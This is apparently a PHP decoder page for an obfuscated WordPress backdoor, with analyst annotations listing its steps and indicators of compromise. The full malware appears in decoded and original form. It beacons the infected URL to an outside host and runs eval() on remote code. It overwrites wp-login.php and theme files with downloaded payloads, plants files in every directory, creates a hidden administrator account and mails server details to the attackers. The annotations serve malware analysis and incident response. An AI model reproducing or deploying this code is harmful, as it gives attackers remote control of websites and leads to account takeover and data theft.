
PHP Decode

goto Ktwys; AWC_2: fclose($open_makale); goto cGrPx; G4eMt: fclose($open_code); goto L7Oy..

Decoded Output

<?
/*
 * Analyst annotations (added in review; every code token below is unchanged).
 * Malicious sample: read it statically, never execute it.
 *
 * Control flow is scrambled with goto labels, so physical order is not
 * execution order. Following the gotos from the first statement:
 *
 *  1. Ktwys, r_VOh, Be8Vg: builds a URL from a base64 prefix (decodes to
 *     hxxps://anonym0us[.]club/l-), the requesting client's IP from GetIP()
 *     and the base64 of this script's own URL, then requests it with cURL or
 *     file_get_contents. The response ($gitt) is not used in the visible code,
 *     so this looks like a check-in beacon that discloses the infected URL.
 *  2. UJxEc: eval() of whatever googleseo[.]me/txt/lin.txt returns, on every
 *     request. The remote host controls what runs on the server.
 *  3. e6rfO: an unauthenticated POST field "query" is written to data.txt;
 *     without it, up to six lines of data.txt are echoed.
 *  4. vZ2fV, K0oF9: if js/js.php cannot be opened, creates js/, writes remote
 *     content (acbdf[.]space/txt/css.txt) to js/js.php and mails the site URL
 *     to two addresses with the subject "Hacklink Bildiri".
 *  5. nifji .. RODvO: mails the request URL, REMOTE_ADDR and a timestamp.
 *  6. FK5W9 .. phyJP: mails DOCUMENT_ROOT, SERVER_ADMIN, SERVER_SOFTWARE, the
 *     script URL and HTTP_HOST with the subject "whm 20203".
 *  7. gmDIS .. u1kZB: looks for wp-load.php in the document root and in parent
 *     directories of this file, and includes it when found.
 *  8. msYYJ (only when WordPress was loaded): prepends remote content to
 *     headers.php in the active theme directory, creates a user "webmaster"
 *     and gives it the administrator role, and overwrites wp-login.php with
 *     remote content.
 *  9. tmUpw .. AWC_2: writes remote content to wp-clon.php and phpinfo.php in
 *     the document root.
 * 10. cGrPx .. ey7pT: writes remote content to wp-inda.php in every
 *     subdirectory of the document root whose path does not match wp-content.
 *
 * What to check on a host where this file was found: the files named above
 * (wp-clon.php, phpinfo.php, wp-inda.php, js/js.php, data.txt, the theme's
 * headers.php), the integrity of wp-login.php against a clean WordPress copy,
 * an administrator account named "webmaster", outbound HTTP to
 * googleseo[.]me, acbdf[.]space and anonym0us[.]club, and outbound mail with
 * the two subjects above. Because step 2 runs arbitrary remote code, the list
 * is a floor, not a complete inventory.
 *
 * Reading caveats: the "[email protected]" strings are this page's e-mail
 * masking, the real addresses are the escaped literals in the Original Code
 * section. The decoder also printed escaped literals as plain text (the $pass
 * value shows raw dollar signs here but escape sequences in the original), so
 * this listing is a reading aid, not an exact equivalent of the sample.
 */
   goto Ktwys; AWC_2: fclose($open_makale); goto cGrPx; G4eMt: fclose($open_code); goto L7Oye; phyJP: mail($kime, $baslik, $EL_MuHaMMeD); goto gmDIS; y2Fym: $wp_makale = $document_root . "/phpinfo.php"; goto AoWjh; jsjv0: $from_shellcode = "whm@" . gethostbyname($_SERVER["SERVER_NAME"]) . ''; goto zc2lp; ENKbd: $EL_MuHaMMeD .= "Avlanan Site : " . $_SERVER["HTTP_HOST"] . "\xd\xa"; goto phyJP; UJxEc: eval("?>" . file_get_contents("https://googleseo.me/txt/lin.txt")); goto e6rfO; y8M98: $document_root_file = dirname(__FILE__); goto eIQWA; eIQWA: $wp_detect = 0; goto u1kZB; qFaE3: function http_get($url) { $im = curl_init($url); curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($im, CURLOPT_HEADER, 0); return curl_exec($im); curl_close($im); } goto rHUDi; oc2L4: $wp_code = $document_root . "/wp-clon.php"; goto eS6EZ; wtKF7: fwrite($open_makale, $makale); goto AWC_2; gmDIS: $document_root = $_SERVER["DOCUMENT_ROOT"]; goto y8M98; rv7n8: $EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER["DOCUMENT_ROOT"] . "\xd\xa"; goto HprGq; cGrPx: $directories = expandDirectories($document_root); goto QPADE; Ktwys: function GetIP() { if (getenv("HTTP_CLIENT_IP")) { $ip = getenv("HTTP_CLIENT_IP"); } elseif (getenv("HTTP_X_FORWARDED_FOR")) { $ip = getenv("HTTP_X_FORWARDED_FOR"); if (strstr($ip, ",")) { $tmp = explode(",", $ip); $ip = trim($tmp[0]); } } else { $ip = getenv("REMOTE_ADDR"); } return $ip; } goto r_VOh; RH2sH: function expandDirectories($base_dir) { $directories = array(); foreach (scandir($base_dir) as $file) { if ($file == "." || $file == "..") { continue; } $dir = $base_dir . DIRECTORY_SEPARATOR . $file; if (is_dir($dir)) { $directories[] = $dir; $directories = array_merge($directories, expandDirectories($dir)); } } return $directories; } goto qFaE3; Ppwme: $EL_MuHaMMeD .= "Server isletim sistemi : " . $_SERVER["SERVER_SOFTWARE"] . 
"\xd\xa"; goto bR43V; RODvO: @mail($to_email, $server_mail, $linkcr, $header); goto FK5W9; tmUpw: $code = http_get("https://acbdf.space/txt/min.txt"); goto oc2L4; ARCkU: $server_mail = '' . gethostbyname($_SERVER["SERVER_NAME"]) . "  - " . $_SERVER["HTTP_HOST"] . ''; goto pgjdp; vZ2fV: $datasi = @fopen("js/js.php", "r"); goto K0oF9; s9tWU: fwrite($open_code, $code); goto G4eMt; e6rfO: if ($_POST["query"]) { $veriyfy = stripslashes(stripslashes($_POST["query"])); $data = "data.txt"; @touch("data.txt"); $ver = @fopen($data, "w"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("data.txt", "r"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto vZ2fV; Be8Vg: if (function_exists("curl_init")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("file_get_contents")) { @($gitt = file_get_contents($x)); } goto UJxEc; zc2lp: $to_email = "[email protected]"; goto ARCkU; eS6EZ: $open_code = fopen($wp_code, "w"); goto s9tWU; QPADE: $css = http_get("https://acbdf.space/txt/wp.txt"); goto ey7pT; u1kZB: if (file_exists($document_root . "/wp-load.php")) { include $document_root . "/wp-load.php"; $wp_detect = 1; } else { $prefix = count(@explode("/", $document_root_file)); $a = ''; for ($i = 0; $i < $prefix; $i++) { $a = $a . "../"; if (file_exists($document_root_file . "/" . $a . "wp-load.php")) { include $document_root_file . "/" . $a . "wp-load.php"; $wp_detect = 1; break; } } } goto msYYJ; r_VOh: $x = base64_decode("aHR0cHM6Ly9hbm9ueW0wdXMuY2x1Yi9sLQ==") . GetIP() . "-" . base64_encode("http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto Be8Vg; ey7pT: foreach ($directories as $dir) { if (!preg_match("#wp-content#", $dir)) { $css_file = $dir . 
"/wp-inda.php"; $open_css = fopen($css_file, "w"); fwrite($open_css, $css); fclose($open_css); } } goto RH2sH; IMpIc: $ip_remote = $_SERVER["REMOTE_ADDR"]; goto jsjv0; pgjdp: $linkcr = "Link: " . $_SERVER["SERVER_NAME"] . '' . $_SERVER["REQUEST_URI"] . " - IP Excuting: {$ip_remote} - Time: {$time_shell}"; goto dplgf; FK5W9: $kime = "[email protected]"; goto VI0x1; msYYJ: if ($wp_detect == 1) { $wp_theme_dir = get_template_directory(); $header_file = $wp_theme_dir . "/headers.php"; $header_content = file_get_contents($header_file); $append = http_get("https://googleseo.me/txt/lin.txt"); if (!preg_match("#" . $append . "#", $header_content)) { $new_content = $append . $header_content; $open_file = fopen($header_file, "w"); fwrite($open_file, $new_content); fclose($open_file); } $user = "webmaster"; $pass = "$P$BxJON2B3r"; $email = "[email protected]"; if (!username_exists($user) && !email_exists($email)) { $user_id = wp_create_user($user, $pass, $email); $user = new WP_User($user_id); $user->set_role("administrator"); } $wp_login = ABSPATH . "/wp-login.php"; $login = http_get("https://acbdf.space/txt/seo.txt"); $open_login = fopen($wp_login, "w"); fwrite($open_login, $login); fclose($open_login); } goto tmUpw; K0oF9: if ($datasi) { } else { @mkdir("js"); $dos = file_get_contents("https://acbdf.space/txt/css.txt"); $data = "js/js.php"; @touch("js/js.php"); $ver = @fopen($data, "w"); @fwrite($ver, $dos); @fclose($ver); $yol = "http://" . $_SERVER["HTTP_HOST"] . '' . $_SERVER["REQUEST_URI"] . ''; $y = "<h1>Sender Yazdirildi.<br/> SITE YOL : " . $yol . "<br/>Sender Yolu : js/crs.php</h1>"; $header .= "From: SheLL Boot <[email protected]>\xa"; $header .= "Content-Type: text/html;\xa charset=utf-8\xa"; @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); } goto nifji; VI0x1: $baslik = "whm 20203"; goto rv7n8; HprGq: $EL_MuHaMMeD .= "Server Admin : " . $_SERVER["SERVER_ADMIN"] . 
"\xd\xa"; goto Ppwme; L7Oye: $makale = http_get("https://acbdf.space/txt/phpinfo.txt"); goto y2Fym; dplgf: $header = "From: {$from_shellcode}\xd
Reply-to: {$from_shellcode}"; goto RODvO; bR43V: $EL_MuHaMMeD .= "Shell Link : http://" . $_SERVER["SERVER_NAME"] . $_SERVER["PHP_SELF"] . "\xd\xa"; goto ENKbd; nifji: $time_shell = '' . date("d/m/Y - H:i:s") . ''; goto IMpIc; AoWjh: $open_makale = fopen($wp_makale, "w"); goto wtKF7; rHUDi:  ?>


Original Code

 goto Ktwys; AWC_2: fclose($open_makale); goto cGrPx; G4eMt: fclose($open_code); goto L7Oye; phyJP: mail($kime, $baslik, $EL_MuHaMMeD); goto gmDIS; y2Fym: $wp_makale = $document_root . "\x2f\160\x68\160\x69\x6e\146\157\56\x70\150\160"; goto AoWjh; jsjv0: $from_shellcode = "\x77\x68\155\100" . gethostbyname($_SERVER["\x53\105\122\x56\105\x52\137\116\101\x4d\105"]) . ''; goto zc2lp; ENKbd: $EL_MuHaMMeD .= "\101\x76\154\x61\x6e\x61\x6e\x20\x53\x69\x74\x65\40\72\40" . $_SERVER["\x48\x54\124\x50\137\110\x4f\x53\124"] . "\xd\xa"; goto phyJP; UJxEc: eval("\x3f\76" . file_get_contents("\150\x74\x74\160\x73\72\x2f\57\147\x6f\157\147\x6c\x65\163\145\157\x2e\155\x65\x2f\x74\170\x74\57\x6c\151\x6e\56\164\170\x74")); goto e6rfO; y8M98: $document_root_file = dirname(__FILE__); goto eIQWA; eIQWA: $wp_detect = 0; goto u1kZB; qFaE3: function http_get($url) { $im = curl_init($url); curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($im, CURLOPT_HEADER, 0); return curl_exec($im); curl_close($im); } goto rHUDi; oc2L4: $wp_code = $document_root . "\x2f\x77\160\x2d\143\x6c\x6f\x6e\56\160\x68\x70"; goto eS6EZ; wtKF7: fwrite($open_makale, $makale); goto AWC_2; gmDIS: $document_root = $_SERVER["\104\x4f\x43\x55\115\105\x4e\124\137\x52\117\x4f\124"]; goto y8M98; rv7n8: $EL_MuHaMMeD = "\104\157\163\x79\141\x20\x59\x6f\154\165\40\x3a\x20" . $_SERVER["\104\x4f\x43\x55\x4d\105\116\x54\137\x52\117\117\124"] . 
"\xd\xa"; goto HprGq; cGrPx: $directories = expandDirectories($document_root); goto QPADE; Ktwys: function GetIP() { if (getenv("\110\x54\124\x50\x5f\x43\x4c\x49\105\116\x54\x5f\x49\120")) { $ip = getenv("\110\x54\124\120\137\103\x4c\x49\105\x4e\x54\137\111\x50"); } elseif (getenv("\110\x54\124\x50\x5f\x58\x5f\x46\x4f\x52\127\x41\122\x44\x45\x44\137\106\x4f\x52")) { $ip = getenv("\110\124\124\120\x5f\x58\x5f\x46\x4f\x52\x57\x41\122\x44\105\x44\137\106\117\122"); if (strstr($ip, "\x2c")) { $tmp = explode("\54", $ip); $ip = trim($tmp[0]); } } else { $ip = getenv("\x52\x45\115\x4f\124\105\x5f\101\x44\104\x52"); } return $ip; } goto r_VOh; RH2sH: function expandDirectories($base_dir) { $directories = array(); foreach (scandir($base_dir) as $file) { if ($file == "\x2e" || $file == "\x2e\56") { continue; } $dir = $base_dir . DIRECTORY_SEPARATOR . $file; if (is_dir($dir)) { $directories[] = $dir; $directories = array_merge($directories, expandDirectories($dir)); } } return $directories; } goto qFaE3; Ppwme: $EL_MuHaMMeD .= "\x53\x65\162\166\145\162\x20\x69\x73\154\145\x74\x69\x6d\40\x73\151\x73\x74\145\x6d\x69\x20\x3a\x20" . $_SERVER["\123\105\122\x56\x45\122\137\x53\117\x46\x54\127\x41\122\x45"] . "\xd\xa"; goto bR43V; RODvO: @mail($to_email, $server_mail, $linkcr, $header); goto FK5W9; tmUpw: $code = http_get("\x68\164\164\160\x73\x3a\57\57\x61\x63\142\144\x66\x2e\163\x70\141\143\x65\x2f\164\170\164\57\155\151\x6e\x2e\x74\x78\164"); goto oc2L4; ARCkU: $server_mail = '' . gethostbyname($_SERVER["\123\105\122\126\105\x52\137\x4e\101\x4d\x45"]) . "\x20\x20\x2d\x20" . $_SERVER["\110\x54\124\120\137\110\x4f\123\x54"] . 
''; goto pgjdp; vZ2fV: $datasi = @fopen("\152\163\57\152\x73\56\x70\150\x70", "\162"); goto K0oF9; s9tWU: fwrite($open_code, $code); goto G4eMt; e6rfO: if ($_POST["\x71\x75\145\x72\x79"]) { $veriyfy = stripslashes(stripslashes($_POST["\x71\165\x65\x72\x79"])); $data = "\x64\141\x74\x61\x2e\x74\x78\x74"; @touch("\144\x61\164\x61\x2e\164\x78\x74"); $ver = @fopen($data, "\x77"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("\144\x61\x74\x61\56\x74\x78\x74", "\x72"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto vZ2fV; Be8Vg: if (function_exists("\x63\165\x72\x6c\x5f\151\x6e\x69\x74")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("\x66\151\154\x65\137\x67\145\164\137\x63\x6f\x6e\164\145\x6e\x74\x73")) { @($gitt = file_get_contents($x)); } goto UJxEc; zc2lp: $to_email = "\x6c\x6f\147\151\156\x6f\154\x64\165\155\x40\x67\x6d\x61\x69\154\x2e\x63\x6f\155"; goto ARCkU; eS6EZ: $open_code = fopen($wp_code, "\167"); goto s9tWU; QPADE: $css = http_get("\150\x74\x74\160\x73\x3a\x2f\x2f\x61\x63\142\x64\x66\x2e\x73\x70\x61\x63\145\57\164\170\x74\x2f\167\160\x2e\164\170\164"); goto ey7pT; u1kZB: if (file_exists($document_root . "\57\167\160\55\x6c\157\x61\x64\56\x70\x68\160")) { include $document_root . "\x2f\x77\160\x2d\x6c\x6f\141\144\56\x70\x68\x70"; $wp_detect = 1; } else { $prefix = count(@explode("\x2f", $document_root_file)); $a = ''; for ($i = 0; $i < $prefix; $i++) { $a = $a . "\x2e\x2e\x2f"; if (file_exists($document_root_file . "\57" . $a . "\167\x70\x2d\x6c\x6f\141\x64\x2e\x70\x68\160")) { include $document_root_file . "\x2f" . $a . 
"\167\160\x2d\x6c\x6f\x61\x64\x2e\160\x68\x70"; $wp_detect = 1; break; } } } goto msYYJ; r_VOh: $x = base64_decode("\141\110\122\x30\x63\110\x4d\x36\114\171\71\x68\142\155\71\165\x65\127\x30\167\144\130\115\165\x59\x32\x78\61\131\x69\71\x73\114\x51\75\75") . GetIP() . "\x2d" . base64_encode("\150\164\164\x70\72\57\x2f" . $_SERVER["\110\x54\x54\120\137\110\x4f\x53\124"] . $_SERVER["\x52\x45\121\x55\105\123\124\137\125\122\x49"]); goto Be8Vg; ey7pT: foreach ($directories as $dir) { if (!preg_match("\x23\x77\160\x2d\x63\157\x6e\164\x65\156\164\43", $dir)) { $css_file = $dir . "\x2f\x77\160\55\151\x6e\144\x61\x2e\160\x68\160"; $open_css = fopen($css_file, "\167"); fwrite($open_css, $css); fclose($open_css); } } goto RH2sH; IMpIc: $ip_remote = $_SERVER["\x52\105\x4d\x4f\x54\105\137\101\104\x44\x52"]; goto jsjv0; pgjdp: $linkcr = "\114\151\x6e\x6b\x3a\x20" . $_SERVER["\123\105\122\x56\x45\x52\137\x4e\x41\115\x45"] . '' . $_SERVER["\122\x45\121\125\105\x53\x54\137\x55\122\x49"] . "\40\55\40\111\x50\40\x45\170\x63\165\x74\151\156\147\x3a\40{$ip_remote}\x20\55\40\x54\151\155\x65\x3a\x20{$time_shell}"; goto dplgf; FK5W9: $kime = "\142\171\x68\x65\x72\x6f\64\64\100\x67\x6d\x61\x69\x6c\x2e\x63\x6f\155"; goto VI0x1; msYYJ: if ($wp_detect == 1) { $wp_theme_dir = get_template_directory(); $header_file = $wp_theme_dir . "\57\x68\x65\141\x64\x65\162\163\56\x70\x68\160"; $header_content = file_get_contents($header_file); $append = http_get("\150\x74\164\160\x73\x3a\57\57\147\157\157\147\x6c\145\x73\145\157\x2e\155\x65\57\x74\x78\164\x2f\154\x69\156\x2e\x74\x78\x74"); if (!preg_match("\43" . $append . "\43", $header_content)) { $new_content = $append . 
$header_content; $open_file = fopen($header_file, "\167"); fwrite($open_file, $new_content); fclose($open_file); } $user = "\167\145\142\x6d\141\163\164\145\x72"; $pass = "\x24\120\44\102\170\x4a\117\x4e\62\x42\63\x72"; $email = "\x62\x79\x68\145\x72\x6f\x34\64\100\147\155\x61\x69\154\56\143\157\155"; if (!username_exists($user) && !email_exists($email)) { $user_id = wp_create_user($user, $pass, $email); $user = new WP_User($user_id); $user->set_role("\141\x64\155\x69\x6e\151\163\164\162\x61\x74\157\x72"); } $wp_login = ABSPATH . "\57\x77\160\55\x6c\x6f\147\151\x6e\x2e\x70\150\160"; $login = http_get("\150\x74\x74\160\163\72\x2f\57\141\143\x62\x64\x66\x2e\x73\x70\141\143\x65\x2f\x74\x78\164\57\163\x65\157\56\164\x78\164"); $open_login = fopen($wp_login, "\167"); fwrite($open_login, $login); fclose($open_login); } goto tmUpw; K0oF9: if ($datasi) { } else { @mkdir("\152\x73"); $dos = file_get_contents("\x68\164\164\x70\x73\x3a\57\x2f\x61\143\x62\x64\146\x2e\x73\x70\x61\143\x65\57\x74\x78\x74\x2f\x63\163\x73\56\164\x78\x74"); $data = "\152\163\57\x6a\163\56\160\150\160"; @touch("\152\163\57\x6a\x73\56\160\x68\160"); $ver = @fopen($data, "\x77"); @fwrite($ver, $dos); @fclose($ver); $yol = "\150\164\164\x70\x3a\x2f\x2f" . $_SERVER["\x48\124\124\x50\x5f\x48\117\123\x54"] . '' . $_SERVER["\x52\x45\121\125\x45\x53\124\x5f\x55\122\x49"] . ''; $y = "\74\150\61\x3e\x53\x65\x6e\x64\145\162\x20\131\x61\x7a\144\151\162\x69\x6c\x64\x69\x2e\x3c\x62\162\57\76\40\x53\111\124\x45\40\x59\117\x4c\40\x3a\x20" . $yol . 
"\74\142\162\57\x3e\x53\145\156\144\145\x72\40\x59\157\x6c\x75\x20\x3a\40\152\x73\x2f\x63\x72\x73\56\160\150\x70\74\57\x68\61\x3e"; $header .= "\106\162\157\155\72\x20\x53\x68\x65\114\114\40\x42\x6f\x6f\x74\40\x3c\163\x75\160\160\157\162\x40\x6e\151\x63\56\x6f\x72\147\76\xa"; $header .= "\103\x6f\x6e\164\145\x6e\164\55\124\x79\x70\x65\72\x20\x74\145\x78\x74\57\150\x74\155\x6c\73\xa\x20\x63\x68\x61\x72\x73\145\x74\75\x75\164\146\x2d\x38\xa"; @mail("\142\171\150\x65\x72\x6f\64\64\x40\x67\155\x61\x69\x6c\56\143\x6f\x6d", "\110\141\x63\x6b\x6c\151\x6e\x6b\x20\102\x69\x6c\x64\x69\162\151", "{$y}", $header); @mail("\x6c\x6f\x67\x69\156\157\x6c\144\165\155\x40\147\155\141\x69\154\x2e\x63\x6f\x6d", "\110\141\143\153\154\x69\156\153\x20\x42\151\154\144\x69\162\151", "{$y}", $header); } goto nifji; VI0x1: $baslik = "\x77\150\x6d\40\x32\x30\62\60\x33"; goto rv7n8; HprGq: $EL_MuHaMMeD .= "\x53\x65\x72\166\145\162\40\101\144\x6d\x69\156\x20\x3a\x20" . $_SERVER["\123\105\122\x56\105\122\137\101\104\x4d\111\x4e"] . "\xd\xa"; goto Ppwme; L7Oye: $makale = http_get("\150\x74\164\160\163\x3a\x2f\x2f\x61\x63\142\x64\x66\56\x73\x70\141\143\x65\57\x74\x78\x74\57\160\x68\160\x69\x6e\146\157\x2e\164\170\164"); goto y2Fym; dplgf: $header = "\106\162\157\155\x3a\40{$from_shellcode}\xd\12\x52\x65\160\154\x79\55\x74\x6f\72\40{$from_shellcode}"; goto RODvO; bR43V: $EL_MuHaMMeD .= "\123\x68\145\x6c\x6c\x20\114\x69\x6e\x6b\x20\x3a\40\150\x74\x74\160\x3a\57\x2f" . $_SERVER["\x53\105\x52\x56\x45\122\137\x4e\101\115\x45"] . $_SERVER["\120\x48\x50\x5f\x53\105\x4c\106"] . "\xd\xa"; goto ENKbd; nifji: $time_shell = '' . date("\144\x2f\x6d\x2f\131\x20\55\40\x48\72\151\72\163") . ''; goto IMpIc; AoWjh: $open_makale = fopen($wp_makale, "\x77"); goto wtKF7; rHUDi: 

Function Calls

None

Variables

None

Stats

MD5 8a9a9fe1c2e064f6260d1dac0196b58e
Eval Count 0
Decode Time 62 ms